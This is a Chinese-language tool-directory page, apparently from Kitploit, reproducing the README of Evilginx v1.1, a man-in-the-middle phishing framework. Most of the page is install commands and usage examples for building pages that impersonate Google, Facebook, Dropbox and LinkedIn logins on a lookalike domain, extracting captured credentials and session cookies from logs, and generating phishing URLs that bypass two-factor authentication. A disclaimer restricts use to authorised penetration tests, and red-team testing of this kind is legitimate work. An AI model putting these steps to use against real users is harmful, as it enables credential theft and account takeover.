Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
evilginx — 请使用新版本:https://github.com/kgretzky/evilginx2 | Kitploit
工具/GitHubGitHub/kgretzky/evilginx
钓鱼工具Web应用程序漏洞利用钓鱼攻击渗透测试社会工程学身份验证红队
GitHubkgretzky/evilginx

evilginx

请使用新版本:https://github.com/kgretzky/evilginx2

查看仓库
1.2k28168年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Evilginx v.1.1.0

Evilginx

此版本已过时。请使用最新版本!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx 是一个中间人攻击框架,用于窃取任意网络服务的登录凭证和会话 Cookie。其核心运行在 Nginx HTTP 服务器上,利用 proxy_pass 和 sub_filter 来代理和修改 HTTP 内容,同时拦截客户端与服务器之间的流量。

你可以在我博客上了解它的工作原理以及如何自行安装:

第一篇文章现已稍有过时:Evilginx - 带双因素认证绕过的高级钓鱼攻击

Evilginx 1.0 更新:Evilginx 1.0 更新 - 提升你的 2FA 钓鱼水平

Evilginx 1.1 更新:Evilginx 1.1 更新

免责声明

我知道 Evilginx 可能被用于非常邪恶的目的。这项工作仅仅是对熟练攻击者能力的演示。防御者有责任在设置防御措施时考虑这类攻击,并找到保护自己免受这种钓鱼方法侵害的方法。 Evilginx 只应在合法的渗透测试任务中使用,且需获得被钓鱼方的书面许可。

贡献者名人堂

@poweroftrue

安装

Evilginx 提供了一个安装脚本 install.sh,可以以“即发即忘”的方式在任何 Debian wheezy/jessie 机器上安装整个软件包。

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

使用

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               配置 Evilginx。
    parse               解析日志文件。
    genurl              生成钓鱼 URL。

optional arguments:
  -h, --help            显示此帮助信息并退出
设置

启用或禁用站点配置以用于 Nginx 服务器,使用提供的 sites 目录中的 Evilginx 模板。

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            显示此帮助信息并退出
  -d DOMAIN, --domain DOMAIN
                        你的钓鱼域名。
  -y                    对所有问题回答“是”。
  -l, --list            列出可用的受支持应用。
  --enable ENABLE       按名称启用以下站点。
  --disable DISABLE     按名称禁用以下站点。

列出可用的站点配置模板:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

使用预注册的钓鱼域名 not-really-google.com 启用谷歌钓鱼站点:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

禁用 Facebook 钓鱼站点:

root@kitploit:~
python evilginx.py setup --disable facebook
解析

解析 Nginx 日志以提取拦截到的登录凭证和会话 Cookie。日志默认保存在 evilginx.py 脚本所在的 logs 目录中。 在设置阶段启用自动解析后,可以自动完成此操作。

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            显示此帮助信息并退出
  -s SITE, --site SITE  要解析日志的站点名称('all' 表示解析所有站点的日志)。
  --debug               解析后不截断日志文件。

仅解析谷歌站点的日志:

root@kitploit:~
python evilginx.py parse -s google

解析所有可用站点的日志:

root@kitploit:~
python evilginx.py parse -s all
生成 URL

生成可在红队评估中使用的钓鱼 URL。

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            显示此帮助信息并退出
  -s SITE, --site SITE  要生成链接的站点名称。
  -r REDIRECT, --redirect REDIRECT
                        成功登录后将用户重定向到该 URL。

生成一个谷歌钓鱼 URL,成功登录后将受害者重定向到 Rick Astley 的“Never Gonna Give You Up”视频:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
下载工具